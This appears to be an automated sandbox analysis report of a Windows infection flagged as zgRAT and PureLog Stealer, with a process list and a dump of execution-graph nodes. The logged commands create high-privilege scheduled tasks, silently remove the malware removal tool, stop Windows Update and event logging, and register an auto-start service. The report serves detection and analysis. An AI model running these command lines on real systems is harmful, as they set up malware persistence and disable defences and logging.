                                                      Path:C:\Windows\System32\schtasks.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:schtasks.exe /create /tn "KZcLqgnLvRf" /sc ONLOGON /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\KZcLqgnLvRf.exe'" /rl HIGHEST /f
                                                      Imagebase:0x7ff76f990000
                                                      File size:235'008 bytes
                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:18
                                                      Start time:10:32:03
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\schtasks.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:schtasks.exe /create /tn "KZcLqgnLvRfK" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\KZcLqgnLvRf.exe'" /rl HIGHEST /f
                                                      Imagebase:0x7ff76f990000
                                                      File size:235'008 bytes
                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:19
                                                      Start time:10:32:03
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\schtasks.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\Recovery\RuntimeBroker.exe'" /f
                                                      Imagebase:0x7ff76f990000
                                                      File size:235'008 bytes
                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:20
                                                      Start time:10:32:03
                                                      Start date:25/04/2024
                                                      Path:C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files (x86)\reference assemblies\Microsoft\Framework\KZcLqgnLvRf.exe"
                                                      Imagebase:0xa40000
                                                      File size:1'968'128 bytes
                                                      MD5 hash:3997D7D058AF3C1B6C9ABB57F6FA1F2A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe, Author: Joe Security
                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe, Author: Joe Security
                                                      Antivirus matches:
                                                      • Detection: 100%, Avira
                                                      • Detection: 100%, Joe Sandbox ML
                                                      • Detection: 88%, ReversingLabs
                                                      • Detection: 74%, Virustotal
                                                      Has exited:false

                                                      Target ID:21
                                                      Start time:10:32:03
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                      Imagebase:0x7ff7f7180000
                                                      File size:289'792 bytes
                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:22
                                                      Start time:10:32:03
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\schtasks.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Recovery\RuntimeBroker.exe'" /rl HIGHEST /f
                                                      Imagebase:0x7ff76f990000
                                                      File size:235'008 bytes
                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:23
                                                      Start time:10:32:03
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                                      Imagebase:0x7ff635830000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:24
                                                      Start time:10:32:03
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:25
                                                      Start time:10:32:03
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:26
                                                      Start time:10:32:03
                                                      Start date:25/04/2024
                                                      Path:C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files (x86)\reference assemblies\Microsoft\Framework\KZcLqgnLvRf.exe"
                                                      Imagebase:0x950000
                                                      File size:1'968'128 bytes
                                                      MD5 hash:3997D7D058AF3C1B6C9ABB57F6FA1F2A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:27
                                                      Start time:10:32:03
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\schtasks.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Recovery\RuntimeBroker.exe'" /rl HIGHEST /f
                                                      Imagebase:0x7ff76f990000
                                                      File size:235'008 bytes
                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:28
                                                      Start time:10:32:03
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\wusa.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                      Imagebase:0x7ff7a9260000
                                                      File size:345'088 bytes
                                                      MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:29
                                                      Start time:10:32:03
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\schtasks.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:schtasks.exe /create /tn "KZcLqgnLvRfK" /sc MINUTE /mo 8 /tr "'C:\Windows\RemotePackages\RemoteDesktops\KZcLqgnLvRf.exe'" /f
                                                      Imagebase:0x7ff76f990000
                                                      File size:235'008 bytes
                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:31
                                                      Start time:10:32:03
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                      Imagebase:0x7ff635830000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:32
                                                      Start time:10:32:03
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:33
                                                      Start time:10:32:03
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\schtasks.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:schtasks.exe /create /tn "KZcLqgnLvRf" /sc ONLOGON /tr "'C:\Windows\RemotePackages\RemoteDesktops\KZcLqgnLvRf.exe'" /rl HIGHEST /f
                                                      Imagebase:0x7ff76f990000
                                                      File size:235'008 bytes
                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:35
                                                      Start time:10:32:03
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\schtasks.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:schtasks.exe /create /tn "KZcLqgnLvRfK" /sc MINUTE /mo 11 /tr "'C:\Windows\RemotePackages\RemoteDesktops\KZcLqgnLvRf.exe'" /rl HIGHEST /f
                                                      Imagebase:0x7ff76f990000
                                                      File size:235'008 bytes
                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:36
                                                      Start time:10:32:03
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                                      Imagebase:0x7ff635830000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:37
                                                      Start time:10:32:03
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:38
                                                      Start time:10:32:03
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\sB1sK52ORC.bat"
                                                      Imagebase:0x7ff7f7180000
                                                      File size:289'792 bytes
                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:39
                                                      Start time:10:32:03
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe stop bits
                                                      Imagebase:0x7ff635830000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:40
                                                      Start time:10:32:03
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:41
                                                      Start time:10:32:03
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:42
                                                      Start time:10:32:03
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\chcp.com
                                                      Wow64 process (32bit):false
                                                      Commandline:chcp 65001
                                                      Imagebase:0x7ff711110000
                                                      File size:14'848 bytes
                                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:43
                                                      Start time:10:32:03
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe stop dosvc
                                                      Imagebase:0x7ff635830000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:44
                                                      Start time:10:32:04
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:45
                                                      Start time:10:32:04
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\PING.EXE
                                                      Wow64 process (32bit):false
                                                      Commandline:ping -n 10 localhost
                                                      Imagebase:0x7ff71e300000
                                                      File size:22'528 bytes
                                                      MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:46
                                                      Start time:10:32:04
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\dialer.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\dialer.exe
                                                      Imagebase:0x7ff783440000
                                                      File size:39'936 bytes
                                                      MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:47
                                                      Start time:10:32:04
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe delete "IFAYFBKT"
                                                      Imagebase:0x7ff635830000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:48
                                                      Start time:10:32:04
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:49
                                                      Start time:10:32:04
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\winlogon.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:winlogon.exe
                                                      Imagebase:0x7ff7cd660000
                                                      File size:906'240 bytes
                                                      MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:50
                                                      Start time:10:32:04
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe create "IFAYFBKT" binpath= "C:\ProgramData\celaehnmjins\nhxnqwkhmssh.exe" start= "auto"
                                                      Imagebase:0x7ff635830000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:51
                                                      Start time:10:32:04
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:52
                                                      Start time:10:32:05
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe stop eventlog
                                                      Imagebase:0x7ff635830000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:53
                                                      Start time:10:32:05
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe start "IFAYFBKT"
                                                      Imagebase:0x7ff635830000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:54
                                                      Start time:10:32:05
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:55
                                                      Start time:10:32:05
                                                      Start date:25/04/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:56
                                                      Start time:10:32:05
                                                      Start date:25/04/2024
                                                      Path:C:\ProgramData\celaehnmjins\nhxnqwkhmssh.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\ProgramData\celaehnmjins\nhxnqwkhmssh.exe
                                                      Imagebase:0x7ff615570000
                                                      File size:5'475'840 bytes
                                                      MD5 hash:7A568EF3F46D369F3D3FFD68FDF68573
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Antivirus matches:
                                                      • Detection: 100%, Avira
                                                      • Detection: 81%, ReversingLabs
                                                      • Detection: 61%, Virustotal
                                                      Has exited:true


                                                        Execution Graph

                                                        Execution Coverage:13.5%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:30.7%
                                                        Total number of Nodes:2000
                                                        Total number of Limit Nodes:23
7ff7f4d6dc6e 20697->20717 20701 7ff7f4d612bc 33 API calls 20698->20701 20699 7ff7f4d6de08 20700 7ff7f4d85bf0 _handle_error 8 API calls 20699->20700 20703 7ff7f4d6de1c 20700->20703 20705 7ff7f4d6dcad 20701->20705 20702 7ff7f4d6de35 20704 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 20702->20704 20703->20559 20706 7ff7f4d6de3a 20704->20706 20707 7ff7f4d612bc 33 API calls 20705->20707 20708 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 20706->20708 20709 7ff7f4d6dcd5 20707->20709 20710 7ff7f4d6de40 20708->20710 20804 7ff7f4d688f8 20709->20804 20712 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 20710->20712 20713 7ff7f4d6de46 20712->20713 20716 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 20713->20716 20714 7ff7f4d6dd71 LoadLibraryW 20714->20717 20715 7ff7f4d6dce7 20715->20706 20715->20710 20715->20714 20718 7ff7f4d6de4c _snwprintf 20716->20718 20717->20699 20717->20702 20717->20713 20719 7ff7f4d6de74 GetModuleHandleW 20718->20719 20720 7ff7f4d6defb 20719->20720 20721 7ff7f4d6dea6 GetProcAddress 20719->20721 20724 7ff7f4d6e383 20720->20724 20851 7ff7f4d8ebfc 39 API calls 2 library calls 20720->20851 20722 7ff7f4d6debb 20721->20722 20723 7ff7f4d6ded3 GetProcAddress 20721->20723 20722->20723 20723->20720 20727 7ff7f4d6dee8 20723->20727 20726 7ff7f4d67c10 34 API calls 20724->20726 20729 7ff7f4d6e38c 20726->20729 20727->20720 20728 7ff7f4d6e230 20728->20724 20730 7ff7f4d6e23a 20728->20730 20820 7ff7f4d68b28 20729->20820 20732 7ff7f4d67c10 34 API calls 20730->20732 20733 7ff7f4d6e243 CreateFileW 20732->20733 20734 7ff7f4d6e283 SetFilePointer 20733->20734 20735 7ff7f4d6e370 CloseHandle 20733->20735 20734->20735 20737 7ff7f4d6e29c ReadFile 20734->20737 20738 7ff7f4d61b70 31 API calls 20735->20738 20737->20735 20739 7ff7f4d6e2c4 20737->20739 20738->20724 20741 7ff7f4d6e2d8 20739->20741 20742 7ff7f4d6e680 20739->20742 20740 7ff7f4d6dc08 77 API calls 20766 7ff7f4d6e39a 20740->20766 20746 7ff7f4d612bc 33 API calls 
20741->20746 20870 7ff7f4d85db4 8 API calls 20742->20870 20744 7ff7f4d6e3be CompareStringW 20744->20766 20745 7ff7f4d612bc 33 API calls 20745->20766 20751 7ff7f4d6e30f 20746->20751 20749 7ff7f4d6e4ba 20752 7ff7f4d6e4c8 20749->20752 20753 7ff7f4d6e642 20749->20753 20750 7ff7f4d61b70 31 API calls 20750->20766 20754 7ff7f4d6e35b 20751->20754 20765 7ff7f4d6dc08 77 API calls 20751->20765 20852 7ff7f4d6cf94 20751->20852 20856 7ff7f4d68be4 47 API calls 20752->20856 20758 7ff7f4d61b70 31 API calls 20753->20758 20760 7ff7f4d61b70 31 API calls 20754->20760 20755 7ff7f4d6e6ab 20763 7ff7f4d6e6c5 SetThreadExecutionState 20755->20763 20872 7ff7f4d63b84 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task 20755->20872 20756 7ff7f4d6e685 20756->20755 20871 7ff7f4d63b84 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task 20756->20871 20764 7ff7f4d6e64b 20758->20764 20767 7ff7f4d6e365 20760->20767 20762 7ff7f4d6e4d1 20768 7ff7f4d66768 9 API calls 20762->20768 20771 7ff7f4d61b70 31 API calls 20764->20771 20765->20751 20766->20740 20766->20744 20766->20745 20766->20750 20788 7ff7f4d6e44c 20766->20788 20828 7ff7f4d66768 20766->20828 20833 7ff7f4d68dc4 20766->20833 20837 7ff7f4d65890 20766->20837 20772 7ff7f4d61b70 31 API calls 20767->20772 20773 7ff7f4d6e4d6 20768->20773 20769 7ff7f4d612bc 33 API calls 20769->20788 20774 7ff7f4d6e655 20771->20774 20772->20735 20775 7ff7f4d6e586 20773->20775 20776 7ff7f4d6e4e1 20773->20776 20778 7ff7f4d85bf0 _handle_error 8 API calls 20774->20778 20780 7ff7f4d6d9c0 48 API calls 20775->20780 20779 7ff7f4d6dc08 77 API calls 20776->20779 20777 7ff7f4d68dc4 47 API calls 20777->20788 20781 7ff7f4d6e664 20778->20781 20782 7ff7f4d6e4ed 20779->20782 20783 7ff7f4d6e5cb AllocConsole 20780->20783 20781->20559 20785 7ff7f4d6dc08 77 API calls 20782->20785 20786 7ff7f4d6e5d5 GetCurrentProcessId AttachConsole 20783->20786 20787 7ff7f4d6e57b 20783->20787 20784 7ff7f4d61b70 31 API calls 20784->20788 20789 7ff7f4d6e4f9 20785->20789 20790 
7ff7f4d6e5ec 20786->20790 20869 7ff7f4d619d0 31 API calls _invalid_parameter_noinfo_noreturn 20787->20869 20788->20749 20788->20769 20788->20777 20788->20784 20791 7ff7f4d65890 51 API calls 20788->20791 20857 7ff7f4d6aee0 20789->20857 20797 7ff7f4d6e5f8 GetStdHandle WriteConsoleW Sleep FreeConsole 20790->20797 20791->20788 20794 7ff7f4d6e639 ExitProcess 20797->20787 20799 7ff7f4d6aee0 48 API calls 20800 7ff7f4d6e54e 20799->20800 20867 7ff7f4d6db54 33 API calls 20800->20867 20802 7ff7f4d6e55a 20868 7ff7f4d619d0 31 API calls _invalid_parameter_noinfo_noreturn 20802->20868 20805 7ff7f4d68936 20804->20805 20873 7ff7f4d62314 20805->20873 20807 7ff7f4d68987 20883 7ff7f4d61c04 20807->20883 20808 7ff7f4d68946 20808->20807 20887 7ff7f4d61734 33 API calls 4 library calls 20808->20887 20811 7ff7f4d689cd 20812 7ff7f4d689f0 20811->20812 20814 7ff7f4d61c80 33 API calls 20811->20814 20813 7ff7f4d68a28 20812->20813 20816 7ff7f4d68a44 20812->20816 20815 7ff7f4d85bf0 _handle_error 8 API calls 20813->20815 20814->20812 20817 7ff7f4d68a39 20815->20817 20818 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 20816->20818 20817->20715 20819 7ff7f4d68a49 20818->20819 20821 7ff7f4d68b40 20820->20821 20822 7ff7f4d68b89 20821->20822 20823 7ff7f4d68b57 20821->20823 20911 7ff7f4d6353c 47 API calls 20822->20911 20825 7ff7f4d612bc 33 API calls 20823->20825 20827 7ff7f4d68b7b 20825->20827 20827->20766 20829 7ff7f4d6678c GetVersionExW 20828->20829 20830 7ff7f4d667bf 20828->20830 20829->20830 20831 7ff7f4d85bf0 _handle_error 8 API calls 20830->20831 20832 7ff7f4d667ec 20831->20832 20832->20766 20834 7ff7f4d68dd9 20833->20834 20912 7ff7f4d68f28 20834->20912 20836 7ff7f4d68dfe 20836->20766 20838 7ff7f4d658bb GetFileAttributesW 20837->20838 20839 7ff7f4d658b8 20837->20839 20840 7ff7f4d658cc 20838->20840 20847 7ff7f4d65949 20838->20847 20839->20838 20921 7ff7f4d680b0 20840->20921 20842 7ff7f4d85bf0 _handle_error 8 API calls 20844 7ff7f4d6595d 20842->20844 20844->20766 20845 7ff7f4d658f7 
GetFileAttributesW 20846 7ff7f4d65910 20845->20846 20846->20847 20848 7ff7f4d6596d 20846->20848 20847->20842 20849 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 20848->20849 20850 7ff7f4d65972 20849->20850 20851->20728 20854 7ff7f4d6cfc6 20852->20854 20853 7ff7f4d6cffa 20853->20751 20854->20853 20855 7ff7f4d61734 33 API calls 20854->20855 20855->20854 20856->20762 20858 7ff7f4d6aef3 20857->20858 21012 7ff7f4d69b74 20858->21012 20861 7ff7f4d6af58 LoadStringW 20862 7ff7f4d6af86 20861->20862 20863 7ff7f4d6af71 LoadStringW 20861->20863 20864 7ff7f4d6d9c0 20862->20864 20863->20862 21038 7ff7f4d6d79c 20864->21038 20867->20802 20868->20787 20869->20794 20870->20756 20871->20755 20872->20763 20874 7ff7f4d62344 20873->20874 20881 7ff7f4d623f8 20873->20881 20875 7ff7f4d62352 memcpy_s 20874->20875 20878 7ff7f4d623f3 20874->20878 20879 7ff7f4d623a1 20874->20879 20875->20808 20897 7ff7f4d61b50 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task std::bad_alloc::bad_alloc 20878->20897 20879->20875 20888 7ff7f4d85aa0 20879->20888 20898 7ff7f4d61bd4 33 API calls std::_Xinvalid_argument 20881->20898 20884 7ff7f4d61c55 20883->20884 20886 7ff7f4d61c29 memcpy_s 20883->20886 20910 7ff7f4d615a8 33 API calls 3 library calls 20884->20910 20886->20811 20887->20807 20892 7ff7f4d85aab 20888->20892 20889 7ff7f4d85ac4 20889->20875 20891 7ff7f4d85aca 20893 7ff7f4d85ad5 20891->20893 20902 7ff7f4d8670c RtlPcToFileHeader RaiseException Concurrency::cancel_current_task std::bad_alloc::bad_alloc 20891->20902 20892->20889 20892->20891 20899 7ff7f4d8f088 20892->20899 20903 7ff7f4d61b50 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task std::bad_alloc::bad_alloc 20893->20903 20904 7ff7f4d8f0c8 20899->20904 